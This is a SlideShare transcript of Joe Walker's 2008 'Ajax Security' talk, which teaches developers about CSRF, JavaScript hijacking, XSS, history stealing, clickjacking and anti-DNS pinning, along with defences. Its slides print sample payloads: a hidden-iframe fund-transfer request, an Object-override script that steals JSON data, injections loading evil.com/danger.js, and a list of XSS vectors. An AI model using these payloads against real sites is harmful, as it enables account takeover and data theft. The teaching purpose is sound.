SlideShare a Scribd company logo
1 of 83
Download to read offline
Ajax Security
              Keeping your application safe
                      Joe Walker




Copyright SitePen, Inc. 2008. All Rights Reserved
89 out of 10 Websites
             have serious vulnerabilities



Copyright SitePen, Inc. 2008. All Rights Reserved
Goal: Keep the bad guys
                      out of your website



Copyright SitePen, Inc. 2008. All Rights Reserved
The Attackers




       Who is the attacker?
        • Troublemakers / Thieves
       Who is the victim?
        • Your data / Your users / Your partners



Copyright SitePen, Inc. 2008. All Rights Reserved
Agenda

                                                    CSRF, Login CSRF
                                                    JavaScript Hijacking
                                                    XSS
                                                    History Stealing
                                                    Combination Attacks
                                                    Session Fixation + ADP +
                                                    Clickjacking



Copyright SitePen, Inc. 2008. All Rights Reserved
CSRF
(Cross Site Request Forgery)

You can still abuse someone else’s cookies
and headers even if you can’t read them
Recap: Cross-Domain Rules


                           www.bank.com                   www.evil.com

       c = document.cookie;                         c = document.cookie;
       alert(c);                                    alert(c);
       /*                                           /*
       Shows cookies from                           Shows cookies from
       www.bank.com                                 www.evil.com
       */                                           */




Copyright SitePen, Inc. 2008. All Rights Reserved
Abusing a Cookie without reading it

                           www.bank.com                       www.evil.com



              Welcome to Bank.com
                                                            Welcome to Evil.com
        We offer the best rates anywhere in
                                                    We’ve got lots of warez to give away
        the world, guaranteed. Give us your
                                                     for freee. Download our stuffs and
          money and we will look after it in
                                                       then come back and get more
          the same way we look after little
                                                    stuffs. Videoz, Warez, Codez, Mp3s
                    baby kittens.
                                                                      .



                     <iframe width=0 height=0
                       src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/>

Copyright SitePen, Inc. 2008. All Rights Reserved
CSRF

       JavaScript is not always required to exploit a CSRF hole

       Often all you need is:
              • <iframe src=quot;dangerous_urlquot;>
              • or <img src=quot;dangerous_urlquot;/>
              • or <script src=quot;dangerous_urlquot;>


       You can’t use XHR because cross-domain rules prevent
       the request from being sent


Copyright SitePen, Inc. 2008. All Rights Reserved
CSRF

       CSRF attacks are write-only (with one exception)

       Both GET and POST can be forged

       Referrer checking is not a complete fix

       It’s not just cookies that get stolen:
          • HTTP-Auth headers
          • Active Directory Kerberos tokens


Copyright SitePen, Inc. 2008. All Rights Reserved
CSRF - Protection

                                                    Not 100%
                                                     solution
       Force users to log off

       Check referrer headers (https only)

       Include authentication tokens
                                                       The only
                                                       complete
       in the body of EVERY request
                                                        solution



Copyright SitePen, Inc. 2008. All Rights Reserved
CSRF - Protection

       Security tokens in GET requests are not a great idea
          (bookmarks, caches, GET is idempotent etc)

       POST means forms with hidden fields
        • OWASP servlet filter
          http://www.owasp.org/index.php/CSRF_Guard

       Double-submit cookie pattern (Ajax requests only)
        • Read the cookie with Javascript and submit in the
          body

Copyright SitePen, Inc. 2008. All Rights Reserved
Login CSRF
(Tricking someone into thinking they are you)



CSRF turned inside out
Login CSRF



       If I can make your browser do things behind your back,
       how about logging you out of some service and back in
       as me.

       What are the possibilities when you think that you are
       you, but you’re not; you’re me?




Copyright SitePen, Inc. 2008. All Rights Reserved
Login CSRF - Attacks



       What can I do?
        • See what you search for
        • See what books you want to buy
        • Read emails that you send
        • Steal credit card details through PayPal
        • etc




Copyright SitePen, Inc. 2008. All Rights Reserved
Login CSRF - Defense



       If submitting over https: use Referrer checking
          • Do not assume no referrer is safe

       Use authentication tokens in your login form
       Watch out for session fixation attacks
        • Invalidate the server session on login and re-create it




Copyright SitePen, Inc. 2008. All Rights Reserved
JavaScript
    Hijacking
  (or how your GMail
 contacts were at risk)



Sucking data out of Objects before
they’re created
JavaScript Hijacking



       “CSRF is write-only with one known exception”

       Using <script> automatically evaluates the returned
       script

       So if you can just find a way to intercept scripts as they
       are evaluated ...



Copyright SitePen, Inc. 2008. All Rights Reserved
<script type=quot;text/javascriptquot;>
            function Object() {
              alert(quot;Hello, Worldquot;);
            }
            var x = {};
            </script>




Copyright SitePen, Inc. 2008. All Rights Reserved
<script type=quot;text/javascriptquot;>
            function Object() {
              this.__defineSetter__('wibble', function(x) {
                alert(x);
              });
            }

            var x = {};
            x.wibble = quot;Hello, Worldquot;;
            </script>




Copyright SitePen, Inc. 2008. All Rights Reserved
<script type=quot;text/javascriptquot;>
            var obj;
            function Object() {
              obj = this;
              this.__defineSetter__('killme', function(x) {
                for (key in obj) {
                  if (key != 'killme') {
                     alert('Stolen: ' + key + '=' + obj[key]);
                  }
                }
              });
              setTimeout(quot;obj['killme']='ignored';quot;, 0);
            }
            </script>
            <script src=quot;http://example.com/data-service/quot;>


Copyright SitePen, Inc. 2008. All Rights Reserved
JavaScript Hijacking



                             When you serve JavaScript from a website it
                             could be evaluated in a hostile environment

                           Protect secrets in JavaScript in the same way
                              that you would protect them elsewhere




Copyright SitePen, Inc. 2008. All Rights Reserved
JavaScript Hijacking



       Sometimes people wish to have a double layer of
       security to prevent evaluation:
         /*<JSON_HERE>*/ (Don’t do this)
         while(true); <JSON_HERE> (Google)
              throw new Error(quot;quot;); <JSON_HERE> (DWR)
              {}&& <JSON_HERE>




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS (Cross Site Scripting)

Abusing someone’s trust in your typing
Copyright SitePen, Inc. 2008. All Rights Reserved
XSS



       2 types:
         • Reflected: Script embedded in the request is
           ‘reflected’ in the response
         • Stored: Attacker’s input is stored and played back in
           later page views




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS

       Scenario: You let the user enter their name

       Someone is going to enter their name like this:
                    Joe<script src=quot;http://evil.com/danger.jsquot;>


       Then, whoever looks at Joe’s name will execute Joe’s
       script and become a slave of Joe

       Generally HTML is not a valid input, but sometimes it is:
        • Blogs, MySpace, Wikis, RSS readers, etc

Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Making User Input Safe




       So, you filter out ‘<script.*>’ and then you’re safe.
       Right?




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Places that scripts get eval()ed
       1. <table
                       background=quot;javascript:danger()quot;>      14.<body
                                                                     background=quot;javascript:danger()quot;>
       2. <input type='image'
                       src='javascript:danger()'/>            15.<div onscroll='danger()'>
       3. <object type=quot;text/x-scriptletquot;                     16.<div onmouseenter='danger()'>
                       data=quot;evil.com/danger.jsquot;>             17.<style>
       4. <img src='javascript:danger()'/>                           @import evil.com/danger.js</style>
       5. <frameset>                                          18.<style>BODY{-moz-binding:url(
                       <frame src=quot;javascript:danger()quot;>             quot;http://evil.com/danger.js#xssquot;
                                                                     )}</style>
       6. <link rel=quot;stylesheetquot;
                       href=quot;javascript:danger()quot;/>           19.<xss
                                                                     style=quot;behavior:url(danger.htc);quot;>
       7. <base href=quot;javascript:danger()quot;>
                                                              20.<div style=quot;background-image:
       8. <meta http-equiv=quot;refreshquot;                                 url(javascript:danger())quot;>
                       content=quot;0;url=javascript:danger()quot;>
                                                              21.<div style=quot;width:
       9. <p style='background-image:                                expression(danger());quot;>
                       url(quot;javascript:danger()quot;)');
                                                              22.<xss style=quot;xss:expression(danger())quot;>
       10.<a href='javascript:danger()'>
       11.<tr
                       background=quot;javascript:danger()quot;>
                                                              Many more
       12.<body onload='danger()'>                            http://ha.ckers.org/xss.html
       13.<div onmouseover='danger()'>




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This:
       <a href=quot;a.htmlquot; link</a>


       makes perfect sense to a browser.




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This:
       <a href=quot;a.htmlquot;>link


       makes perfect sense to a browser.




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This:
       <a href=quot;a.html >link</a>


       makes perfect sense to a browser.




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This: (depending on some encoding tricks)
       ¼a href=quot;a.htmlquot;¾link¼/a¾


       makes perfect sense to a browser.




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Making User Input Safe


       And we haven’t got into:
         • Flash (ActionScript ~= JavaScript)
         • SVG (can embed JavaScript)
         • XML Data Islands (IE only)
         • HTML+TIME
       You can use both <object> and <embed> for many of
       these



Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - The Heart of the Problem




                                “Be conservative in what you do; be
                                liberal in what you accept from others”
                                                             Postel’s Law




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - The Heart of the Problem



                            In                      +       A   Out



                                                        B



Copyright SitePen, Inc. 2008. All Rights Reserved
The web developers get lazy ...
Copyright SitePen, Inc. 2008. All Rights Reserved
The browser fixes the problems ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The users like
    the new
   browser ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The web
developers
get even
lazier ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The browser fixes the problems ...




Copyright SitePen, Inc. 2008. All Rights Reserved
The users like the
                                                    new browser even
                                                        more ...




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - The Heart of the Problem



                  ¼STYLE¾@import'javas
                  cri

                  pt:danger()';¼/STYLE¾




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Protection (HTML is Illegal)

       1. Filter inputs by white-listing input characters
         • Remember to filter header names and values

       2. Filter outputs for the destination environment
           For HTML:
                            < &lt;                   > &gt;   ' &apos;     quot; &quot; & &amp;
                     For JavaScript Strings (but see later):
                            ' '                    quot; quot;   LF n   CR r   * uXXXX

                     Other environments have other special chars


Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Protection (well-formed HTML is legal)

                  1. Filter inputs as before
                  2. Validate as HTML and throw away if it fails
                  3. Swap characters for entities (as before)
                  4. Swap back whitelist of allowed tags. e.g.:
                         • &lt;strong&gt;           <strong>

                  5. Take extra care over attributes:
                         • &lta href=&quot;([^&]*)&quot;/&gt;
                              <a href=quot;$1quot;/>

                  6. Take great care over regular expressions


Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Protection (malformed HTML is legal)



                  1. Find another way to do it / Swap jobs / Find
                  some other solution to the problem
                  2. Create a tag soup parser to create a DOM tree
                  from a badly formed HTML document
                    • Remember to recursively check encodings
                  3. Create a tree walker that removes all non
                  approved elements and attributes


Copyright SitePen, Inc. 2008. All Rights Reserved
There is NO WAY to protect
            against some injection points



Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Injection Points

       Places you can protect:
         • Plain content
           <div>$</div>
         • Some attribute values
           <input name=x value=quot;$quot;> (but take care)
         • Javascript string values:
           <script>str = quot;$quot;;</script> (but take care)

       Anything else is likely to be unsafe


Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Injection Points

       Places you can’t easily protect:
          • <script>$</script>
          • <div $>
          • <div style=quot;$quot;>...
          • <div background=quot;$quot;>
          • <img src=quot;$quot;>
          • etc
       If users can affect CSS values, hrefs, srcs or plain
       JavaScript then you are likely to have an XSS hole


Copyright SitePen, Inc. 2008. All Rights Reserved
XSS Tricks:
                                    Comment Power-up



Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Comment Power-up



       Commonly reflected attacks have length restrictions

       How to create space for an injection attack
        • Use ‘<script>/*’ in an restricted unprotected field
          and ‘*/’ in a later unrestricted protected field




Copyright SitePen, Inc. 2008. All Rights Reserved
XSS - Summary

       For data input:
              • Restrict allowed characters for destination type

       For data output:
              • Escaped for the destination environment
              • Ensure encoding is specified (e.g. UTF-8)

       Allow inject only into known safe points

       Never assume that a hole is too small to jump through


Copyright SitePen, Inc. 2008. All Rights Reserved
History Stealing



I know where you’ve been, parts 1, 2, 3
History Stealing - Part 1


       Mr. Evil wants to know if you visit bank.com

       He creates a page with a link and
       uses a script to read the CSS link
       color:
         • purple: customer
         • blue: not a customer



Copyright SitePen, Inc. 2008. All Rights Reserved
History Stealing - Part 2




       2 methods of detecting link color:
         • Easy - use JavaScript to read CSS properties
         • When JS is turned off - use CSS to ping the server




Copyright SitePen, Inc. 2008. All Rights Reserved
History Stealing - Part 2



       Point a script tag at a protected HTML resource, detect
       differing replies by differing error messages
       <script src=quot;http://mail.google.com/mailquot;>


       http://ha.ckers.org/weird/javascript-website-login-checker.html




Copyright SitePen, Inc. 2008. All Rights Reserved
History Stealing - Part 3

       A page can quickly check thousands of sites and find
       where you bank and store your email

       A page can follow your clicks around the net:
         • Check for common set of URLs
         • Page reports hits to server
         • Server reads hit pages, greps out links sends links
           back
         • Page checks and follows a click-stream


Copyright SitePen, Inc. 2008. All Rights Reserved
Combination Attacks
Small holes don’t add up, they
multiply up
Web Worms

       If your site that isn’t 100% safe against XSS and CSRF, users
       can attack their ‘friends’ with scripts




       XHR/Flash/Quicktime can be used as a vector
       Web worms grow much faster than email worms
       So far, infections have been mostly benign, like how email
       worms were in the early 90’s ...
       http://www.whitehatsec.com/downloads/WHXSSThreats.pdf


Copyright SitePen, Inc. 2008. All Rights Reserved
Intranet Hacking



       History stealing to enumerate hosts inside the firewall
       Anti-DNS pinning to read HTML from inside
       Many routers / firewalls / etc have default passwords,
       which an attacker can exploit
       Use CSRF to alter router / firewall settings
       http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf




Copyright SitePen, Inc. 2008. All Rights Reserved
Clickjacking



When the page you are looking at is not
the page you think you are looking at
Clickjacking - Protection




                  if (window.top != window) {
                    document.body.style.display = quot;nonequot;;
                  }




Copyright SitePen, Inc. 2008. All Rights Reserved
ADP = Anti DNS Pinning



Moving intranet servers into your
domain
Anti-DNS Pinning

                                                    DNS for evil.com


                                                               1.2.3.4




                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                                  DNS for evil.com


                                                                             1.2.3.4



                                                    Let’s visit
                                                    evil.com                 10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                    DNS for evil.com

              What’s the IP address
                 for evil.com?                                 1.2.3.4




                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                    DNS for evil.com
                              You need 1.2.3.4
                              (timeout = 1 sec)
                                                               1.2.3.4




                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                                       DNS for evil.com


                                                                                  1.2.3.4


                                                       Can I have
                                                    http://evil.com?
                                                                                  10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning
                                    HTML +
                                                    DNS for evil.com
                                JavaScript that
                               creates an iframe
                                2 seconds after
                                                               1.2.3.4
                                 the page has
                                    loaded



                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                                  DNS for evil.com


                                                                             1.2.3.4



                                                    Time passes
                                                    (2 seconds)              10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                    DNS for evil.com

              What’s the IP address
                 for evil.com?                                 1.2.3.4




                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                    DNS for evil.com

                         You need 10.0.0.1
                                                               1.2.3.4




                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                                    DNS for evil.com


                                                                               1.2.3.4




                                                          Can I have           10.0.0.1
                                                    http://evil.com/blah?

Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                                                                       DNS for evil.com


                                                                                  1.2.3.4


                                                    This web server is really
                                                    http://intranet.corp.com
                                                                                  10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

                  Outer frame reads                 DNS for evil.com
                    text from inner
                  iframe and sends
                  it back to 1.2.3.4                           1.2.3.4




                                                               10.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning


       About ‘Pinning’:
       Browsers ‘pin’ addresses to stop short timeouts
       DNS round-robin forces re-query of DNS if
       website appears to be down
       So websites can get around pins by firewalling
       themselves thus appearing to be down


Copyright SitePen, Inc. 2008. All Rights Reserved
Anti-DNS Pinning

       It’s not great for the Internet:

       The browser thinks the domain is evil.com, so cookies
       for innocent.com are not sent:
          Cookie protected resources are safe (for now)

       But it’s great for Intranet hacking
         No cookies needed to read from
         192.168.0.1 or 127.0.0.1


Copyright SitePen, Inc. 2008. All Rights Reserved
Questions?

                                        Joe Walker
                   http://sitepen.com
        http://directwebremoting.org/blog/joe

Copyright SitePen, Inc. 2008. All Rights Reserved
Web 2.0 Hacking



Everything has a down side
Web 2.0 Hacking

       Building blocks:
        • Google Alerts: Search to EMail
        • Mailinator: EMail to RSS
        • Ponyfish: Web to RSS via scraping
        • Storage: DabbleDB, Zoho
        • Yahoo Pipes: RSS remixing
        • L8R: Cron for EMail
        • Google Mashup Editor: RSS to REST API
        • Dapper, OpenKappow


Copyright SitePen, Inc. 2008. All Rights Reserved
More Information



Copyright SitePen, Inc. 2008. All Rights Reserved
Dropping SSL after login is dangerous


       Being able to snoop on someone else’s cookie is
       virtually the same as being able to snoop on their
       password
       Some services (e.g. Google) default to http after login
       (bad), but allow you to use https for the whole session:
          • https://mail.google.com/mail/
          • https://www.google.com/calendar/
          • etc.



Copyright SitePen, Inc. 2008. All Rights Reserved
Useful Tools

       Firefox:
          • NoScript - Accept scripts only from sites you trust
          • AltCookies - Accept cookies only from sites you trust
          • EditCooikes - Alter cookies for testing
          • Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP
       General:
          • Paros - Filtering Proxy (can be configured to be
            transparent)
          • Burp - Like Paros
          • Fiddler - Like Paros with integration into IE


Copyright SitePen, Inc. 2008. All Rights Reserved

More Related Content

What's hot

#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015Matt Raible
 
jQuery Proven Performance Tips & Tricks
jQuery Proven Performance Tips & TricksjQuery Proven Performance Tips & Tricks
jQuery Proven Performance Tips & TricksAddy Osmani
 
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)Nicholas Zakas
 
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJ
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJRealize mais com HTML 5 e CSS 3 - 16 EDTED - RJ
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJLeonardo Balter
 
Building an HTML5 Video Player
Building an HTML5 Video PlayerBuilding an HTML5 Video Player
Building an HTML5 Video PlayerJim Jeffers
 
High Performance JavaScript (CapitolJS 2011)
High Performance JavaScript (CapitolJS 2011)High Performance JavaScript (CapitolJS 2011)
High Performance JavaScript (CapitolJS 2011)Nicholas Zakas
 
JavaScript Library Overview
JavaScript Library OverviewJavaScript Library Overview
JavaScript Library Overviewjeresig
 
High Performance Ajax Applications
High Performance Ajax ApplicationsHigh Performance Ajax Applications
High Performance Ajax ApplicationsSiarhei Barysiuk
 
Building a JavaScript Library
Building a JavaScript LibraryBuilding a JavaScript Library
Building a JavaScript Libraryjeresig
 
Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsersjeresig
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup PerformanceJustin Cataldo
 
From YUI3 to K2
From YUI3 to K2From YUI3 to K2
From YUI3 to K2kaven yan
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
The Theory Of The Dom
The Theory Of The DomThe Theory Of The Dom
The Theory Of The Domkaven yan
 

What's hot (20)

#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
 
jQuery Proven Performance Tips & Tricks
jQuery Proven Performance Tips & TricksjQuery Proven Performance Tips & Tricks
jQuery Proven Performance Tips & Tricks
 
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)
 
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJ
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJRealize mais com HTML 5 e CSS 3 - 16 EDTED - RJ
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJ
 
Building an HTML5 Video Player
Building an HTML5 Video PlayerBuilding an HTML5 Video Player
Building an HTML5 Video Player
 
High Performance JavaScript (CapitolJS 2011)
High Performance JavaScript (CapitolJS 2011)High Performance JavaScript (CapitolJS 2011)
High Performance JavaScript (CapitolJS 2011)
 
JavaScript Library Overview
JavaScript Library OverviewJavaScript Library Overview
JavaScript Library Overview
 
High Performance Ajax Applications
High Performance Ajax ApplicationsHigh Performance Ajax Applications
High Performance Ajax Applications
 
JavaScript Basics with baby steps
JavaScript Basics with baby stepsJavaScript Basics with baby steps
JavaScript Basics with baby steps
 
Dan Webb Presentation
Dan Webb PresentationDan Webb Presentation
Dan Webb Presentation
 
jQuery UI and Plugins
jQuery UI and PluginsjQuery UI and Plugins
jQuery UI and Plugins
 
Building a JavaScript Library
Building a JavaScript LibraryBuilding a JavaScript Library
Building a JavaScript Library
 
Ugo Cei Presentation
Ugo Cei PresentationUgo Cei Presentation
Ugo Cei Presentation
 
Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsers
 
Javascript Best Practices
Javascript Best PracticesJavascript Best Practices
Javascript Best Practices
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
Sanjeev ghai 12
Sanjeev ghai 12Sanjeev ghai 12
Sanjeev ghai 12
 
From YUI3 to K2
From YUI3 to K2From YUI3 to K2
From YUI3 to K2
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
 
The Theory Of The Dom
The Theory Of The DomThe Theory Of The Dom
The Theory Of The Dom
 

Viewers also liked

Hacking for Fun and Profit
Hacking for Fun and ProfitHacking for Fun and Profit
Hacking for Fun and ProfitApkudo
 
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...ZongXian Shen
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngVõ Thái Lâm
 
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android ApplicationsSteelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android ApplicationsTom Keetch
 
Reverse engineering and instrumentation of android apps
Reverse engineering and instrumentation of android appsReverse engineering and instrumentation of android apps
Reverse engineering and instrumentation of android appsGaurav Lochan
 
Normativa Firma Digitale
Normativa Firma DigitaleNormativa Firma Digitale
Normativa Firma DigitaleAndrea Rossetti
 
Kiezen van een open source content management systeem drie uitgangspunten e...
Kiezen van een open source content management systeem   drie uitgangspunten e...Kiezen van een open source content management systeem   drie uitgangspunten e...
Kiezen van een open source content management systeem drie uitgangspunten e...Geert Wissink
 
ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」Hikaru GOTO
 
Las Tendas-Madrid
Las Tendas-MadridLas Tendas-Madrid
Las Tendas-Madridguest149d7a
 
Breidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow UniversityBreidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow UniversityAlan Doherty
 
Psicologia
PsicologiaPsicologia
Psicologiacaro13
 
Training And Development Why Bother
Training And  Development   Why BotherTraining And  Development   Why Bother
Training And Development Why Bothernjweiss
 
Blue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo DayBlue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo DayAmazon Web Services
 
Image & Graphic Files
Image & Graphic FilesImage & Graphic Files
Image & Graphic Filesbs07d3p
 

Viewers also liked (20)

Hacking for Fun and Profit
Hacking for Fun and ProfitHacking for Fun and Profit
Hacking for Fun and Profit
 
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn Cường
 
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android ApplicationsSteelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
 
Reverse engineering and instrumentation of android apps
Reverse engineering and instrumentation of android appsReverse engineering and instrumentation of android apps
Reverse engineering and instrumentation of android apps
 
Understanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual MachineUnderstanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual Machine
 
Normativa Firma Digitale
Normativa Firma DigitaleNormativa Firma Digitale
Normativa Firma Digitale
 
Kiezen van een open source content management systeem drie uitgangspunten e...
Kiezen van een open source content management systeem   drie uitgangspunten e...Kiezen van een open source content management systeem   drie uitgangspunten e...
Kiezen van een open source content management systeem drie uitgangspunten e...
 
Kyoto Gardens
Kyoto GardensKyoto Gardens
Kyoto Gardens
 
ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」
 
Juliols
JuliolsJuliols
Juliols
 
25
2525
25
 
หมวก6ใบ
หมวก6ใบหมวก6ใบ
หมวก6ใบ
 
Las Tendas-Madrid
Las Tendas-MadridLas Tendas-Madrid
Las Tendas-Madrid
 
Final Learning Process
Final Learning ProcessFinal Learning Process
Final Learning Process
 
Breidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow UniversityBreidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow University
 
Psicologia
PsicologiaPsicologia
Psicologia
 
Training And Development Why Bother
Training And  Development   Why BotherTraining And  Development   Why Bother
Training And Development Why Bother
 
Blue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo DayBlue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo Day
 
Image & Graphic Files
Image & Graphic FilesImage & Graphic Files
Image & Graphic Files
 

Similar to Ajax Security

Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAsjohnwilander
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)johnwilander
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
JavaScript Security
